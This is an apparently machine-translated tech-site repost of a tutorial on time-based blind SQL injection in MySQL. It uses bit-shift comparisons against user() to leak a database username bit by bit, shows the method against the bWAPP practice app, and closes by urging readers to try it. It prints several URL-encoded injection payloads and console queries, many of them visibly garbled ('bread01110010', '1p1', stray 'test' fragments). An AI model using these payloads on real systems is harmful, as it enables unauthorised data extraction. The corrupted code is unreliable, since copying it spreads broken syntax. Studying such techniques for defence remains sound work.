How to use MySQL bit functions and operators for efficient time-based SQL blind injection 03/31 Update SLTechnology News&Howtos

How to use MySQL bit functions and operators for efficient time-based SQL blind injection

2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

This article focuses on "how to use MySQL bit functions and operators for efficient time-based SQL blind injection", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "how to use MySQL bit functions and operators for efficient time-based SQL blind injection"!

The right shift operator shifts the 1-bit bit of the binary value to the right, as follows:

Mysql > select ascii (bread01110010'); +-+ | ascii (bread01110010') | +-+ | 114 | +-+ 1 row in set (0.00 sec) mysql > select ascii (bread01110010') > > 1 +-+ | ascii (bread01110010') > > 1 | +-+ | 57 | +-+ 1 row in set (0.00 sec)

This can be used to enumerate the characters of a string when SQL is blind. If the data appears in the complete ASCII table, you can enumerate up to 8 requests per character.

The data we want to extract here is the first character returned by the select user () query.

No. 1:

We first find the first value:

There are two possibilities:

0 (Decimal value: 0) / / TRUE condition

1 (Decimal value: 1) / / FALSE condition

The SQL query causes a time delay, so the condition is TRUE and the first bit is 0

No. 2:

Now let's look for the value of the second bit, and there are two possibilities as above:

00 (Decimal value: 0) / / TRUE condition

01 (Decimal value: 1) / / FALSE condition

The SQL query has no time delay, so the condition is that the second bit of FALSE is 1.

01?

No. 3:

Now let's look for the value of the third bit, and there are the same two possibilities:

010 (Decimal value: 2) / / TRUE

011 (Decimal value: 3) / / FALSE

The SQL query has no time delay, so the condition is that the third bit of FALSE is 1.

011?

No. 4:

Now let's look for the value of the fourth bit, two possibilities:

0110 (Decimal: 6) / / TRUE

0111 (Decimal: 7) / / FALSE

Mysql > select if ((ascii ((substr (user (), 1p1)) > > 4) = 6 false' (1000000000 test' ('test') +-+ | if ((ascii ((substr (user (), 1 test') > > 4) = 6 test' (1000 000) 'false') | +-+ | false | | +-+ 1 row in set (0.00 sec) |

The SQL query has no time delay, so the condition is that the fourth bit of FALSE is 1.

0111????

No. 5:

Now let's look for the value of the fifth place, two possibilities:

01110 (Decimal: 14) / TRUE

01111 (Decimal: 15) / / FALSE

The SQL query causes a time delay, so the condition is that the fifth bit of TRUE is 0

01110???

No. 6:

Now let's look for the value of the sixth bit, two possibilities:

011100 (Decimal: 28) / / TRUE

011101 (Decimal: 29) / / FALSE

The SQL query causes a time delay, so the condition is that the sixth bit of TRUE is 0

011100??

No. 7:

Now let's look for the value of the seventh bit, two possibilities:

0111000 (Decimal: 56) / / TRUE

0111001 (Decimal: 57) / / FALSE

The SQL query has no time delay, so the condition is that the seventh bit of FALSE is 1.

The fourth place must be 1

0111001?

No. 8:

Now let's look for the value of the eighth digit, two possibilities:

01110010 (Decimal: 114) / / TRUE

01110011 (Decimal: 115) / / FALSE

The SQL query causes a time delay, so the condition is that the eighth bit of TRUE is 0

01110010

At this point, we have fully obtained the binary value of the first character returned by the select user () query, which is converted to decimal. However, 114 represents the r character in the ASCII table, so the first letter of the database user name is r.

Mysql > select user (); +-+ | user () | +-+ | root@localhost | +-+ 1 row in set (0.00 sec)

To illustrate this type of SQL blind injection attack, I have shown you how to enumerate the first and last binary bits of the first character returned by "select user ()" on bWAPP vulnerable applications: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

1. The first bit of SQLi string returns the TRUE condition:

Test%27+and+if+ ((ascii ((substr (user (), 1pr 1) + > > + 7 +) = 0 false' 5 ('test')), +' false') 23

two。 The first bit of SQLi string returns the FALSE condition:

Test%27+and+if+ ((ascii ((substr (user (), 1 test') + > > + 7 +) = 1 test'), + 'false') 23

3. The eighth bit SQLi string returns the FALSE condition:

Test%27+and+if+ ((ascii ((substr (user (), 1 test') + > > + 0 +) = 114 false' 5 ('test')), +' false') 23

At this point, I believe you have a deeper understanding of "how to use MySQL bit functions and operators for efficient time-based SQL blind injection". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.